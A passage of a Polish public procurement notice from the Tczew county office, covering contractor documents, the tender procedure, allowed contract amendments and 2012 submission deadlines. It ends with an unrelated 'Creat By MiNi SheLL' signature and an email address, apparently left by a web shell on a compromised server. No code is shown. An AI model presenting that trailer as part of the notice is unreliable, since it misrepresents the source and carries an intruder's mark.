5.1.10	Jeżeli wykonawca wykazując spełnienie warunku, o którym  mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której podmiot posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych.  

5.2.4	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 5.2.3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio do miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
5.2.5	Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych  w art. 26 ust. 2b ustawy Pzp, zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą wymaganych dokumentów potwierdzających brak podstaw do wykluczenia określonych w pkt 5.2.1 i 5.2.2 oraz dokumentów, określonych w § 4 Rozporządzenia w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz. 1817) jeżeli dotyczy, dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji części zamówienia.
Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im kwalifikacje zawodowe/dokumenty uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie/ wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA)  -  stron umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12a i innych przepisów ustawy z dnia 7 lipca 1994r. Prawo Budowlane (tekst jedn. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm.) oraz ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany postanowień niniejszej umowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności w następujących przypadkach:
1)	zmiany osoby: 
a.	przedstawiciela Zamawiającego na budowie - polegająca na wyznaczeniu nowego/ych osoby/osób pełniących daną funkcję,
b.	kierownika budowy i/ lub kierownika robót - polegająca na wyznaczeniu nowej/ych osoby/osób pełniących daną funkcję pod warunkiem zgodności postanowieniami SIWZ.
2)	zmiany/przedłużenia terminu wykonania robót w przypadkach:
a) 		natrafienia na różnego rodzaju wykopaliska (zabytki) i związaną z tym koniecznością prowadzenia prac archeologicznych,
b) 	konieczności dokonania zmian w dokumentacji projektowej o czas niezbędny do dokonania zmian w projekcie oraz ewentualnie o czas niezbędny dla dostosowania się Wykonawcy do takiej zmiany,
c) 	wykonania robót zamiennych, o których mowa w pkt 5, o czas niezbędny na ich realizację; 
d)	konieczności poprawy warunków wykonywania robót zagrażających bezpieczeństwu o czas niezbędny do dokonania ich poprawy, jeżeli warunki zagrażające bezpieczeństwu powstały bez winy Wykonawcy;
e) nie zależnego od stron umowy przedłużania się okresu trwania procedur prowadzonych przez organy administracji publicznej lub inne podmioty - właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji robót budowlanych;
f) konieczności wszczęcia dodatkowych procedur prowadzonych przez organy administracji publicznej lub inne podmioty właściwe do wydania niezbędnych decyzji, pozwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji robót budowlanych;
g)	nie zależnego od Wykonawcy przedłużania się okresu trwania dostawy trudnodostępnych, wymagających zamówienia urządzeń niezbędnych do prawidłowej realizacji robót budowlanych;
h)  wystąpienia siły wyższej, o której mowa w pkt 8; 
i) 	z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych,
j) innych niż ww. w niniejszym pkt 2) okoliczności niepowstałych z winy Wykonawcy o czas niezbędny z nimi związany;
3)	konieczności zmiany podwykonawcy, za uprzednią zgodą Zamawiającego oraz pod warunkiem zgodności z postanowieniami SIWZ;
4)	konieczności zmiany kwoty podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawnych, w szczególności przepisów podatkowych dotyczących obowiązującej wysokości (stawki) podatku VAT;
5)   	wykonania robót zamiennych:
      a)  w sytuacji zaistnienia obiektywnej niemożliwości wykonania robót zgodnie z projektem budowlanym, spowodowanej warunkami terenowymi istniejącymi na placu budowy lub zaplanowanym złym doborem materiałów, technologii w trakcie robót budowlanych albo innymi błędami projektowymi - pod warunkiem zatwierdzenia tych zmian przez projektanta. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
      b) w sytuacji zaistnienia możliwości wprowadzenia lepszych rozwiązań technologicznych lub lepszych materiałów czy urządzeń w stosunku pod warunkiem zatwierdzenia tych zmian przez projektanta, a nowe rozwiązania są korzystne dla Zamawiającego. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
      c)  w przypadku powstania niezgodności dokumentacji projektowej ze stanem faktycznym powodującej, że realizacja zgodnie z dokumentacją projektową wiązałaby się z niegospodarnością, a nowe rozwiązania zapobiegałyby tej niegospodarności, pod warunkiem zatwierdzenia tych zmian przez projektanta. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego,
d)   	w sytuacji zaistnienia obiektywnej niemożliwości wykonania robót zgodnie z projektem budowlanym, spowodowanej natrafieniem na różnego rodzaju wykopaliska (zabytki) i związaną z tym koniecznością prowadzenia prac archeologicznych albo siedlisk ptaków lub innych zwierząt podlegających ochronie i związaną z tym potrzebą uruchomienia stosownych działań i procedur, pod warunkiem zatwierdzenia zmian przez projektanta. Wykonanie robót zamiennych nie wpłynie na zmianę wysokości umówionego wynagrodzenia ryczałtowego.
e)   	na wskutek innych niż ww. w niniejszym pkt 5) okoliczności niepowstałych z winy Wykonawcy
     6)   konieczności wprowadzenia zmian umowy wynikających z konieczności dostosowania   zakresu robót objętych umową do powszechnie obowiązujących przepisów prawa; 
     7)  	konieczności wprowadzenia zmian umowy w następstwie siły wyższej, tj. zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia (niemożliwość zapobieżenia nie tyle samemu zjawisku, co jego następstwom), w tym m.in. katastrofa naturalna, katastrofalne działanie przyrody, np. ulewne opady deszczu, obfite opady śniegu, strajk, zamieszki uliczne, pożar, powódź, eksplozja, wojna, atak terrorystyczny, np. w zakresie wykonania robót zamiennych, rozwiązań zamiennych;
2.	Wykonawca jest zobowiązany do pisemnego poinformowania Zamawiającego o zmianie siedziby. Jeżeli nie dopełni tego obowiązku, korespondencję skierowaną na adres wskazany we wstępie umowy uważa się za skutecznie dostarczoną.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.powiat.tczew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, pok. nr 318 i 319..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Tczewie, woj. pomorskie kod 83-110, ulica Piaskowa 2, w Biurze Obsługi Klienta w pokoju nr 04..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com